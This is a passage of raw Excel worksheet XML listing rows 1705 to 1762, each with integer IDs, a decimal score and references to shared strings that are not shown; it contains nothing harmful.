      <c r="E1705">
        <v>0.44850000739097601</v>
      </c>
      <c r="F1705" t="s">
        <v>7</v>
      </c>
      <c r="G1705" t="s">
        <v>3365</v>
      </c>
      <c r="H1705" t="s">
        <v>3366</v>
      </c>
    </row>
    <row r="1706" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1706" s="1">
        <v>1704</v>
      </c>
      <c r="B1706">
        <v>438</v>
      </c>
      <c r="C1706">
        <v>438</v>
      </c>
      <c r="D1706">
        <v>0</v>
      </c>
      <c r="E1706">
        <v>0.99400001764297485</v>
      </c>
      <c r="F1706" t="s">
        <v>7</v>
      </c>
      <c r="G1706" t="s">
        <v>3367</v>
      </c>
      <c r="H1706" t="s">
        <v>3368</v>
      </c>
    </row>
    <row r="1707" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1707" s="1">
        <v>1705</v>
      </c>
      <c r="B1707">
        <v>5346</v>
      </c>
      <c r="C1707">
        <v>5346</v>
      </c>
      <c r="D1707">
        <v>0</v>
      </c>
      <c r="E1707">
        <v>0.72219997644424438</v>
      </c>
      <c r="F1707" t="s">
        <v>7</v>
      </c>
      <c r="G1707" t="s">
        <v>3369</v>
      </c>
      <c r="H1707" t="s">
        <v>3370</v>
      </c>
    </row>
    <row r="1708" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1708" s="1">
        <v>1706</v>
      </c>
      <c r="B1708">
        <v>1199</v>
      </c>
      <c r="C1708">
        <v>1199</v>
      </c>
      <c r="D1708">
        <v>0</v>
      </c>
      <c r="E1708">
        <v>0.66070002317428589</v>
      </c>
      <c r="F1708" t="s">
        <v>7</v>
      </c>
      <c r="G1708" t="s">
        <v>3371</v>
      </c>
      <c r="H1708" t="s">
        <v>3372</v>
      </c>
    </row>
    <row r="1709" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1709" s="1">
        <v>1707</v>
      </c>
      <c r="B1709">
        <v>4920</v>
      </c>
      <c r="C1709">
        <v>4920</v>
      </c>
      <c r="D1709">
        <v>0</v>
      </c>
      <c r="E1709">
        <v>0.51999998092651367</v>
      </c>
      <c r="F1709" t="s">
        <v>7</v>
      </c>
      <c r="G1709" t="s">
        <v>3373</v>
      </c>
      <c r="H1709" t="s">
        <v>3374</v>
      </c>
    </row>
    <row r="1710" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1710" s="1">
        <v>1708</v>
      </c>
      <c r="B1710">
        <v>356</v>
      </c>
      <c r="C1710">
        <v>356</v>
      </c>
      <c r="D1710">
        <v>0</v>
      </c>
      <c r="E1710">
        <v>0.51789999008178711</v>
      </c>
      <c r="F1710" t="s">
        <v>7</v>
      </c>
      <c r="G1710" t="s">
        <v>3375</v>
      </c>
      <c r="H1710" t="s">
        <v>3376</v>
      </c>
    </row>
    <row r="1711" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1711" s="1">
        <v>1709</v>
      </c>
      <c r="B1711">
        <v>5658</v>
      </c>
      <c r="C1711">
        <v>5658</v>
      </c>
      <c r="D1711">
        <v>0</v>
      </c>
      <c r="E1711">
        <v>0.99550002813339233</v>
      </c>
      <c r="F1711" t="s">
        <v>7</v>
      </c>
      <c r="G1711" t="s">
        <v>3377</v>
      </c>
      <c r="H1711" t="s">
        <v>3378</v>
      </c>
    </row>
    <row r="1712" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1712" s="1">
        <v>1710</v>
      </c>
      <c r="B1712">
        <v>1195</v>
      </c>
      <c r="C1712">
        <v>1195</v>
      </c>
      <c r="D1712">
        <v>0</v>
      </c>
      <c r="E1712">
        <v>0.98860001564025879</v>
      </c>
      <c r="F1712" t="s">
        <v>7</v>
      </c>
      <c r="G1712" t="s">
        <v>3379</v>
      </c>
      <c r="H1712" t="s">
        <v>3380</v>
      </c>
    </row>
    <row r="1713" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1713" s="1">
        <v>1711</v>
      </c>
      <c r="B1713">
        <v>442</v>
      </c>
      <c r="C1713">
        <v>442</v>
      </c>
      <c r="D1713">
        <v>0</v>
      </c>
      <c r="E1713">
        <v>0.53219997882843018</v>
      </c>
      <c r="F1713" t="s">
        <v>7</v>
      </c>
      <c r="G1713" t="s">
        <v>3381</v>
      </c>
      <c r="H1713" t="s">
        <v>3382</v>
      </c>
    </row>
    <row r="1714" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1714" s="1">
        <v>1712</v>
      </c>
      <c r="B1714">
        <v>7762</v>
      </c>
      <c r="C1714">
        <v>7762</v>
      </c>
      <c r="D1714">
        <v>0</v>
      </c>
      <c r="E1714">
        <v>0.61559998989105225</v>
      </c>
      <c r="F1714" t="s">
        <v>7</v>
      </c>
      <c r="G1714" t="s">
        <v>3383</v>
      </c>
      <c r="H1714" t="s">
        <v>3384</v>
      </c>
    </row>
    <row r="1715" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1715" s="1">
        <v>1713</v>
      </c>
      <c r="B1715">
        <v>1201</v>
      </c>
      <c r="C1715">
        <v>1201</v>
      </c>
      <c r="D1715">
        <v>0</v>
      </c>
      <c r="E1715">
        <v>0.78380000591278076</v>
      </c>
      <c r="F1715" t="s">
        <v>7</v>
      </c>
      <c r="G1715" t="s">
        <v>3385</v>
      </c>
      <c r="H1715" t="s">
        <v>3386</v>
      </c>
    </row>
    <row r="1716" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1716" s="1">
        <v>1714</v>
      </c>
      <c r="B1716">
        <v>43</v>
      </c>
      <c r="C1716">
        <v>43</v>
      </c>
      <c r="D1716">
        <v>0</v>
      </c>
      <c r="E1716">
        <v>0.70270001888275146</v>
      </c>
      <c r="F1716" t="s">
        <v>7</v>
      </c>
      <c r="G1716" t="s">
        <v>3387</v>
      </c>
      <c r="H1716" t="s">
        <v>3388</v>
      </c>
    </row>
    <row r="1717" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1717" s="1">
        <v>1715</v>
      </c>
      <c r="B1717">
        <v>7763</v>
      </c>
      <c r="C1717">
        <v>7763</v>
      </c>
      <c r="D1717">
        <v>0</v>
      </c>
      <c r="E1717">
        <v>0.351500004529953</v>
      </c>
      <c r="F1717" t="s">
        <v>7</v>
      </c>
      <c r="G1717" t="s">
        <v>3389</v>
      </c>
      <c r="H1717" t="s">
        <v>3390</v>
      </c>
    </row>
    <row r="1718" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1718" s="1">
        <v>1716</v>
      </c>
      <c r="B1718">
        <v>1189</v>
      </c>
      <c r="C1718">
        <v>1189</v>
      </c>
      <c r="D1718">
        <v>0</v>
      </c>
      <c r="E1718">
        <v>0.82950001955032349</v>
      </c>
      <c r="F1718" t="s">
        <v>7</v>
      </c>
      <c r="G1718" t="s">
        <v>3391</v>
      </c>
      <c r="H1718" t="s">
        <v>3392</v>
      </c>
    </row>
    <row r="1719" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1719" s="1">
        <v>1717</v>
      </c>
      <c r="B1719">
        <v>446</v>
      </c>
      <c r="C1719">
        <v>446</v>
      </c>
      <c r="D1719">
        <v>0</v>
      </c>
      <c r="E1719">
        <v>0.99290001392364502</v>
      </c>
      <c r="F1719" t="s">
        <v>7</v>
      </c>
      <c r="G1719" t="s">
        <v>3393</v>
      </c>
      <c r="H1719" t="s">
        <v>3394</v>
      </c>
    </row>
    <row r="1720" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1720" s="1">
        <v>1718</v>
      </c>
      <c r="B1720">
        <v>5687</v>
      </c>
      <c r="C1720">
        <v>5687</v>
      </c>
      <c r="D1720">
        <v>0</v>
      </c>
      <c r="E1720">
        <v>0.7872999906539917</v>
      </c>
      <c r="F1720" t="s">
        <v>7</v>
      </c>
      <c r="G1720" t="s">
        <v>3395</v>
      </c>
      <c r="H1720" t="s">
        <v>3396</v>
      </c>
    </row>
    <row r="1721" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1721" s="1">
        <v>1719</v>
      </c>
      <c r="B1721">
        <v>448</v>
      </c>
      <c r="C1721">
        <v>448</v>
      </c>
      <c r="D1721">
        <v>0</v>
      </c>
      <c r="E1721">
        <v>0.9868999719619751</v>
      </c>
      <c r="F1721" t="s">
        <v>7</v>
      </c>
      <c r="G1721" t="s">
        <v>3397</v>
      </c>
      <c r="H1721" t="s">
        <v>3398</v>
      </c>
    </row>
    <row r="1722" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1722" s="1">
        <v>1720</v>
      </c>
      <c r="B1722">
        <v>48</v>
      </c>
      <c r="C1722">
        <v>48</v>
      </c>
      <c r="D1722">
        <v>0</v>
      </c>
      <c r="E1722">
        <v>0.98549997806549072</v>
      </c>
      <c r="F1722" t="s">
        <v>7</v>
      </c>
      <c r="G1722" t="s">
        <v>3399</v>
      </c>
      <c r="H1722" t="s">
        <v>3400</v>
      </c>
    </row>
    <row r="1723" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1723" s="1">
        <v>1721</v>
      </c>
      <c r="B1723">
        <v>5547</v>
      </c>
      <c r="C1723">
        <v>5547</v>
      </c>
      <c r="D1723">
        <v>0</v>
      </c>
      <c r="E1723">
        <v>0.99900001287460327</v>
      </c>
      <c r="F1723" t="s">
        <v>7</v>
      </c>
      <c r="G1723" t="s">
        <v>3401</v>
      </c>
      <c r="H1723" t="s">
        <v>3402</v>
      </c>
    </row>
    <row r="1724" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1724" s="1">
        <v>1722</v>
      </c>
      <c r="B1724">
        <v>7726</v>
      </c>
      <c r="C1724">
        <v>7726</v>
      </c>
      <c r="D1724">
        <v>0</v>
      </c>
      <c r="E1724">
        <v>0.42329999804496771</v>
      </c>
      <c r="F1724" t="s">
        <v>7</v>
      </c>
      <c r="G1724" t="s">
        <v>3403</v>
      </c>
      <c r="H1724" t="s">
        <v>3404</v>
      </c>
    </row>
    <row r="1725" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1725" s="1">
        <v>1723</v>
      </c>
      <c r="B1725">
        <v>51</v>
      </c>
      <c r="C1725">
        <v>51</v>
      </c>
      <c r="D1725">
        <v>0</v>
      </c>
      <c r="E1725">
        <v>0.66780000925064087</v>
      </c>
      <c r="F1725" t="s">
        <v>7</v>
      </c>
      <c r="G1725" t="s">
        <v>3405</v>
      </c>
      <c r="H1725" t="s">
        <v>3406</v>
      </c>
    </row>
    <row r="1726" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1726" s="1">
        <v>1724</v>
      </c>
      <c r="B1726">
        <v>1191</v>
      </c>
      <c r="C1726">
        <v>1191</v>
      </c>
      <c r="D1726">
        <v>0</v>
      </c>
      <c r="E1726">
        <v>0.9124000072479248</v>
      </c>
      <c r="F1726" t="s">
        <v>7</v>
      </c>
      <c r="G1726" t="s">
        <v>3407</v>
      </c>
      <c r="H1726" t="s">
        <v>3408</v>
      </c>
    </row>
    <row r="1727" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1727" s="1">
        <v>1725</v>
      </c>
      <c r="B1727">
        <v>450</v>
      </c>
      <c r="C1727">
        <v>450</v>
      </c>
      <c r="D1727">
        <v>0</v>
      </c>
      <c r="E1727">
        <v>0.59640002250671387</v>
      </c>
      <c r="F1727" t="s">
        <v>7</v>
      </c>
      <c r="G1727" t="s">
        <v>3409</v>
      </c>
      <c r="H1727" t="s">
        <v>3410</v>
      </c>
    </row>
    <row r="1728" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1728" s="1">
        <v>1726</v>
      </c>
      <c r="B1728">
        <v>5347</v>
      </c>
      <c r="C1728">
        <v>5347</v>
      </c>
      <c r="D1728">
        <v>0</v>
      </c>
      <c r="E1728">
        <v>0.53960001468658447</v>
      </c>
      <c r="F1728" t="s">
        <v>7</v>
      </c>
      <c r="G1728" t="s">
        <v>3411</v>
      </c>
      <c r="H1728" t="s">
        <v>3412</v>
      </c>
    </row>
    <row r="1729" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1729" s="1">
        <v>1727</v>
      </c>
      <c r="B1729">
        <v>5349</v>
      </c>
      <c r="C1729">
        <v>5349</v>
      </c>
      <c r="D1729">
        <v>0</v>
      </c>
      <c r="E1729">
        <v>0.44990000128746033</v>
      </c>
      <c r="F1729" t="s">
        <v>7</v>
      </c>
      <c r="G1729" t="s">
        <v>3413</v>
      </c>
      <c r="H1729" t="s">
        <v>3414</v>
      </c>
    </row>
    <row r="1730" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1730" s="1">
        <v>1728</v>
      </c>
      <c r="B1730">
        <v>423</v>
      </c>
      <c r="C1730">
        <v>423</v>
      </c>
      <c r="D1730">
        <v>0</v>
      </c>
      <c r="E1730">
        <v>0.45849999785423279</v>
      </c>
      <c r="F1730" t="s">
        <v>7</v>
      </c>
      <c r="G1730" t="s">
        <v>3415</v>
      </c>
      <c r="H1730" t="s">
        <v>3416</v>
      </c>
    </row>
    <row r="1731" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1731" s="1">
        <v>1729</v>
      </c>
      <c r="B1731">
        <v>425</v>
      </c>
      <c r="C1731">
        <v>425</v>
      </c>
      <c r="D1731">
        <v>0</v>
      </c>
      <c r="E1731">
        <v>0.61619997024536133</v>
      </c>
      <c r="F1731" t="s">
        <v>7</v>
      </c>
      <c r="G1731" t="s">
        <v>3417</v>
      </c>
      <c r="H1731" t="s">
        <v>3418</v>
      </c>
    </row>
    <row r="1732" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1732" s="1">
        <v>1730</v>
      </c>
      <c r="B1732">
        <v>5352</v>
      </c>
      <c r="C1732">
        <v>5352</v>
      </c>
      <c r="D1732">
        <v>0</v>
      </c>
      <c r="E1732">
        <v>0.86729997396469116</v>
      </c>
      <c r="F1732" t="s">
        <v>7</v>
      </c>
      <c r="G1732" t="s">
        <v>3419</v>
      </c>
      <c r="H1732" t="s">
        <v>3420</v>
      </c>
    </row>
    <row r="1733" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1733" s="1">
        <v>1731</v>
      </c>
      <c r="B1733">
        <v>1209</v>
      </c>
      <c r="C1733">
        <v>1209</v>
      </c>
      <c r="D1733">
        <v>0</v>
      </c>
      <c r="E1733">
        <v>0.93370002508163452</v>
      </c>
      <c r="F1733" t="s">
        <v>7</v>
      </c>
      <c r="G1733" t="s">
        <v>3421</v>
      </c>
      <c r="H1733" t="s">
        <v>3422</v>
      </c>
    </row>
    <row r="1734" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1734" s="1">
        <v>1732</v>
      </c>
      <c r="B1734">
        <v>1208</v>
      </c>
      <c r="C1734">
        <v>1208</v>
      </c>
      <c r="D1734">
        <v>0</v>
      </c>
      <c r="E1734">
        <v>0.99750000238418579</v>
      </c>
      <c r="F1734" t="s">
        <v>7</v>
      </c>
      <c r="G1734" t="s">
        <v>3423</v>
      </c>
      <c r="H1734" t="s">
        <v>3424</v>
      </c>
    </row>
    <row r="1735" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1735" s="1">
        <v>1733</v>
      </c>
      <c r="B1735">
        <v>361</v>
      </c>
      <c r="C1735">
        <v>361</v>
      </c>
      <c r="D1735">
        <v>0</v>
      </c>
      <c r="E1735">
        <v>0.69230002164840698</v>
      </c>
      <c r="F1735" t="s">
        <v>7</v>
      </c>
      <c r="G1735" t="s">
        <v>3425</v>
      </c>
      <c r="H1735" t="s">
        <v>3426</v>
      </c>
    </row>
    <row r="1736" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1736" s="1">
        <v>1734</v>
      </c>
      <c r="B1736">
        <v>5396</v>
      </c>
      <c r="C1736">
        <v>5396</v>
      </c>
      <c r="D1736">
        <v>0</v>
      </c>
      <c r="E1736">
        <v>0.99879997968673706</v>
      </c>
      <c r="F1736" t="s">
        <v>7</v>
      </c>
      <c r="G1736" t="s">
        <v>3427</v>
      </c>
      <c r="H1736" t="s">
        <v>3428</v>
      </c>
    </row>
    <row r="1737" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1737" s="1">
        <v>1735</v>
      </c>
      <c r="B1737">
        <v>429</v>
      </c>
      <c r="C1737">
        <v>429</v>
      </c>
      <c r="D1737">
        <v>0</v>
      </c>
      <c r="E1737">
        <v>0.99370002746582031</v>
      </c>
      <c r="F1737" t="s">
        <v>7</v>
      </c>
      <c r="G1737" t="s">
        <v>3429</v>
      </c>
      <c r="H1737" t="s">
        <v>3430</v>
      </c>
    </row>
    <row r="1738" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1738" s="1">
        <v>1736</v>
      </c>
      <c r="B1738">
        <v>7730</v>
      </c>
      <c r="C1738">
        <v>7730</v>
      </c>
      <c r="D1738">
        <v>0</v>
      </c>
      <c r="E1738">
        <v>0.61559998989105225</v>
      </c>
      <c r="F1738" t="s">
        <v>7</v>
      </c>
      <c r="G1738" t="s">
        <v>3431</v>
      </c>
      <c r="H1738" t="s">
        <v>3432</v>
      </c>
    </row>
    <row r="1739" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1739" s="1">
        <v>1737</v>
      </c>
      <c r="B1739">
        <v>436</v>
      </c>
      <c r="C1739">
        <v>436</v>
      </c>
      <c r="D1739">
        <v>0</v>
      </c>
      <c r="E1739">
        <v>0.95469999313354492</v>
      </c>
      <c r="F1739" t="s">
        <v>7</v>
      </c>
      <c r="G1739" t="s">
        <v>3433</v>
      </c>
      <c r="H1739" t="s">
        <v>3434</v>
      </c>
    </row>
    <row r="1740" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1740" s="1">
        <v>1738</v>
      </c>
      <c r="B1740">
        <v>5397</v>
      </c>
      <c r="C1740">
        <v>5397</v>
      </c>
      <c r="D1740">
        <v>0</v>
      </c>
      <c r="E1740">
        <v>0.99299997091293335</v>
      </c>
      <c r="F1740" t="s">
        <v>7</v>
      </c>
      <c r="G1740" t="s">
        <v>3435</v>
      </c>
      <c r="H1740" t="s">
        <v>3436</v>
      </c>
    </row>
    <row r="1741" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1741" s="1">
        <v>1739</v>
      </c>
      <c r="B1741">
        <v>431</v>
      </c>
      <c r="C1741">
        <v>431</v>
      </c>
      <c r="D1741">
        <v>0</v>
      </c>
      <c r="E1741">
        <v>0.84170001745223999</v>
      </c>
      <c r="F1741" t="s">
        <v>7</v>
      </c>
      <c r="G1741" t="s">
        <v>3437</v>
      </c>
      <c r="H1741" t="s">
        <v>3438</v>
      </c>
    </row>
    <row r="1742" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1742" s="1">
        <v>1740</v>
      </c>
      <c r="B1742">
        <v>7904</v>
      </c>
      <c r="C1742">
        <v>7904</v>
      </c>
      <c r="D1742">
        <v>0</v>
      </c>
      <c r="E1742">
        <v>0.66039997339248657</v>
      </c>
      <c r="F1742" t="s">
        <v>7</v>
      </c>
      <c r="G1742" t="s">
        <v>3439</v>
      </c>
      <c r="H1742" t="s">
        <v>3440</v>
      </c>
    </row>
    <row r="1743" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1743" s="1">
        <v>1741</v>
      </c>
      <c r="B1743">
        <v>4916</v>
      </c>
      <c r="C1743">
        <v>4916</v>
      </c>
      <c r="D1743">
        <v>0</v>
      </c>
      <c r="E1743">
        <v>0.63690000772476196</v>
      </c>
      <c r="F1743" t="s">
        <v>7</v>
      </c>
      <c r="G1743" t="s">
        <v>3441</v>
      </c>
      <c r="H1743" t="s">
        <v>3442</v>
      </c>
    </row>
    <row r="1744" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1744" s="1">
        <v>1742</v>
      </c>
      <c r="B1744">
        <v>7760</v>
      </c>
      <c r="C1744">
        <v>7760</v>
      </c>
      <c r="D1744">
        <v>0</v>
      </c>
      <c r="E1744">
        <v>0.9528999924659729</v>
      </c>
      <c r="F1744" t="s">
        <v>7</v>
      </c>
      <c r="G1744" t="s">
        <v>3443</v>
      </c>
      <c r="H1744" t="s">
        <v>3444</v>
      </c>
    </row>
    <row r="1745" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1745" s="1">
        <v>1743</v>
      </c>
      <c r="B1745">
        <v>1205</v>
      </c>
      <c r="C1745">
        <v>1205</v>
      </c>
      <c r="D1745">
        <v>0</v>
      </c>
      <c r="E1745">
        <v>0.993399977684021</v>
      </c>
      <c r="F1745" t="s">
        <v>7</v>
      </c>
      <c r="G1745" t="s">
        <v>3445</v>
      </c>
      <c r="H1745" t="s">
        <v>3446</v>
      </c>
    </row>
    <row r="1746" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1746" s="1">
        <v>1744</v>
      </c>
      <c r="B1746">
        <v>432</v>
      </c>
      <c r="C1746">
        <v>432</v>
      </c>
      <c r="D1746">
        <v>0</v>
      </c>
      <c r="E1746">
        <v>0.71050000190734863</v>
      </c>
      <c r="F1746" t="s">
        <v>7</v>
      </c>
      <c r="G1746" t="s">
        <v>3447</v>
      </c>
      <c r="H1746" t="s">
        <v>3448</v>
      </c>
    </row>
    <row r="1747" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1747" s="1">
        <v>1745</v>
      </c>
      <c r="B1747">
        <v>5555</v>
      </c>
      <c r="C1747">
        <v>5555</v>
      </c>
      <c r="D1747">
        <v>0</v>
      </c>
      <c r="E1747">
        <v>0.68879997730255127</v>
      </c>
      <c r="F1747" t="s">
        <v>7</v>
      </c>
      <c r="G1747" t="s">
        <v>3449</v>
      </c>
      <c r="H1747" t="s">
        <v>3450</v>
      </c>
    </row>
    <row r="1748" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1748" s="1">
        <v>1746</v>
      </c>
      <c r="B1748">
        <v>433</v>
      </c>
      <c r="C1748">
        <v>433</v>
      </c>
      <c r="D1748">
        <v>0</v>
      </c>
      <c r="E1748">
        <v>0.76179999113082886</v>
      </c>
      <c r="F1748" t="s">
        <v>7</v>
      </c>
      <c r="G1748" t="s">
        <v>3451</v>
      </c>
      <c r="H1748" t="s">
        <v>3452</v>
      </c>
    </row>
    <row r="1749" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1749" s="1">
        <v>1747</v>
      </c>
      <c r="B1749">
        <v>40</v>
      </c>
      <c r="C1749">
        <v>40</v>
      </c>
      <c r="D1749">
        <v>0</v>
      </c>
      <c r="E1749">
        <v>0.8848000168800354</v>
      </c>
      <c r="F1749" t="s">
        <v>7</v>
      </c>
      <c r="G1749" t="s">
        <v>3453</v>
      </c>
      <c r="H1749" t="s">
        <v>3454</v>
      </c>
    </row>
    <row r="1750" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1750" s="1">
        <v>1748</v>
      </c>
      <c r="B1750">
        <v>7905</v>
      </c>
      <c r="C1750">
        <v>7905</v>
      </c>
      <c r="D1750">
        <v>0</v>
      </c>
      <c r="E1750">
        <v>0.79170000553131104</v>
      </c>
      <c r="F1750" t="s">
        <v>7</v>
      </c>
      <c r="G1750" t="s">
        <v>3455</v>
      </c>
      <c r="H1750" t="s">
        <v>3456</v>
      </c>
    </row>
    <row r="1751" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1751" s="1">
        <v>1749</v>
      </c>
      <c r="B1751">
        <v>5709</v>
      </c>
      <c r="C1751">
        <v>5709</v>
      </c>
      <c r="D1751">
        <v>0</v>
      </c>
      <c r="E1751">
        <v>0.99839997291564941</v>
      </c>
      <c r="F1751" t="s">
        <v>7</v>
      </c>
      <c r="G1751" t="s">
        <v>3457</v>
      </c>
      <c r="H1751" t="s">
        <v>3458</v>
      </c>
    </row>
    <row r="1752" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1752" s="1">
        <v>1750</v>
      </c>
      <c r="B1752">
        <v>350</v>
      </c>
      <c r="C1752">
        <v>350</v>
      </c>
      <c r="D1752">
        <v>0</v>
      </c>
      <c r="E1752">
        <v>0.506600022315979</v>
      </c>
      <c r="F1752" t="s">
        <v>7</v>
      </c>
      <c r="G1752" t="s">
        <v>3459</v>
      </c>
      <c r="H1752" t="s">
        <v>3460</v>
      </c>
    </row>
    <row r="1753" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1753" s="1">
        <v>1751</v>
      </c>
      <c r="B1753">
        <v>5836</v>
      </c>
      <c r="C1753">
        <v>5836</v>
      </c>
      <c r="D1753">
        <v>0</v>
      </c>
      <c r="E1753">
        <v>0.99540001153945923</v>
      </c>
      <c r="F1753" t="s">
        <v>7</v>
      </c>
      <c r="G1753" t="s">
        <v>3461</v>
      </c>
      <c r="H1753" t="s">
        <v>3462</v>
      </c>
    </row>
    <row r="1754" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1754" s="1">
        <v>1752</v>
      </c>
      <c r="B1754">
        <v>7391</v>
      </c>
      <c r="C1754">
        <v>7391</v>
      </c>
      <c r="D1754">
        <v>0</v>
      </c>
      <c r="E1754">
        <v>0.95160001516342163</v>
      </c>
      <c r="F1754" t="s">
        <v>7</v>
      </c>
      <c r="G1754" t="s">
        <v>3463</v>
      </c>
      <c r="H1754" t="s">
        <v>3464</v>
      </c>
    </row>
    <row r="1755" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1755" s="1">
        <v>1753</v>
      </c>
      <c r="B1755">
        <v>7392</v>
      </c>
      <c r="C1755">
        <v>7392</v>
      </c>
      <c r="D1755">
        <v>0</v>
      </c>
      <c r="E1755">
        <v>0.98879998922348022</v>
      </c>
      <c r="F1755" t="s">
        <v>7</v>
      </c>
      <c r="G1755" t="s">
        <v>3465</v>
      </c>
      <c r="H1755" t="s">
        <v>3466</v>
      </c>
    </row>
    <row r="1756" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1756" s="1">
        <v>1754</v>
      </c>
      <c r="B1756">
        <v>7393</v>
      </c>
      <c r="C1756">
        <v>7393</v>
      </c>
      <c r="D1756">
        <v>0</v>
      </c>
      <c r="E1756">
        <v>0.93910002708435059</v>
      </c>
      <c r="F1756" t="s">
        <v>7</v>
      </c>
      <c r="G1756" t="s">
        <v>3467</v>
      </c>
      <c r="H1756" t="s">
        <v>3468</v>
      </c>
    </row>
    <row r="1757" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1757" s="1">
        <v>1755</v>
      </c>
      <c r="B1757">
        <v>1154</v>
      </c>
      <c r="C1757">
        <v>1154</v>
      </c>
      <c r="D1757">
        <v>0</v>
      </c>
      <c r="E1757">
        <v>0.67830002307891846</v>
      </c>
      <c r="F1757" t="s">
        <v>7</v>
      </c>
      <c r="G1757" t="s">
        <v>3469</v>
      </c>
      <c r="H1757" t="s">
        <v>3470</v>
      </c>
    </row>
    <row r="1758" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1758" s="1">
        <v>1756</v>
      </c>
      <c r="B1758">
        <v>7396</v>
      </c>
      <c r="C1758">
        <v>7396</v>
      </c>
      <c r="D1758">
        <v>0</v>
      </c>
      <c r="E1758">
        <v>0.6557999849319458</v>
      </c>
      <c r="F1758" t="s">
        <v>7</v>
      </c>
      <c r="G1758" t="s">
        <v>3471</v>
      </c>
      <c r="H1758" t="s">
        <v>3472</v>
      </c>
    </row>
    <row r="1759" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1759" s="1">
        <v>1757</v>
      </c>
      <c r="B1759">
        <v>1152</v>
      </c>
      <c r="C1759">
        <v>1152</v>
      </c>
      <c r="D1759">
        <v>0</v>
      </c>
      <c r="E1759">
        <v>0.96060001850128174</v>
      </c>
      <c r="F1759" t="s">
        <v>7</v>
      </c>
      <c r="G1759" t="s">
        <v>3473</v>
      </c>
      <c r="H1759" t="s">
        <v>3474</v>
      </c>
    </row>
    <row r="1760" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1760" s="1">
        <v>1758</v>
      </c>
      <c r="B1760">
        <v>5543</v>
      </c>
      <c r="C1760">
        <v>5543</v>
      </c>
      <c r="D1760">
        <v>0</v>
      </c>
      <c r="E1760">
        <v>0.99790000915527344</v>
      </c>
      <c r="F1760" t="s">
        <v>7</v>
      </c>
      <c r="G1760" t="s">
        <v>3475</v>
      </c>
      <c r="H1760" t="s">
        <v>3476</v>
      </c>
    </row>
    <row r="1761" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1761" s="1">
        <v>1759</v>
      </c>
      <c r="B1761">
        <v>1151</v>
      </c>
      <c r="C1761">
        <v>1151</v>
      </c>
      <c r="D1761">
        <v>0</v>
      </c>
      <c r="E1761">
        <v>0.99650001525878906</v>
      </c>
      <c r="F1761" t="s">
        <v>7</v>
      </c>
      <c r="G1761" t="s">
        <v>3477</v>
      </c>
      <c r="H1761" t="s">
        <v>3478</v>
      </c>
    </row>
    <row r="1762" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1762" s="1">
        <v>1760</v>
      </c>
      <c r="B1762">
        <v>5825</v>
      </c>
      <c r="C1762">
        <v>5825</v>
      </c>
      <c r="D1762">
        <v>0</v>
      </c>
      <c r="E1762">
        <v>0.9189000129699707</v>
      </c>
      <c r="F1762" t="s">
        <v>7</v>
      </c>
      <c r="G1762" t="s">
        <v>3479</v>
      </c>
      <c r="H1762" t="s">
        <v>3480</v>
      </c>
    </row>
    <row r="1763" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1763" s="1">
        <v>1761</v>
      </c>
      <c r="B1763">
        <v>337</v>
      </c>
      <c r="C1763">
        <v>337</v>
      </c>
      <c r="D1763">
        <v>0</v>
      </c>
      <c r="E1763">
        <v>0.58789998292922974</v>
      </c>
      <c r="F1763" t="s">
        <v>7</v>
      </c>
      <c r="G1763" t="s">
        <v>3481</v>
      </c>
      <c r="H1763" t="s">
        <v>3482</v>
      </c>
    </row>
    <row r="1764" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1764" s="1">
        <v>1762</v>
      </c>
      <c r="B1764">
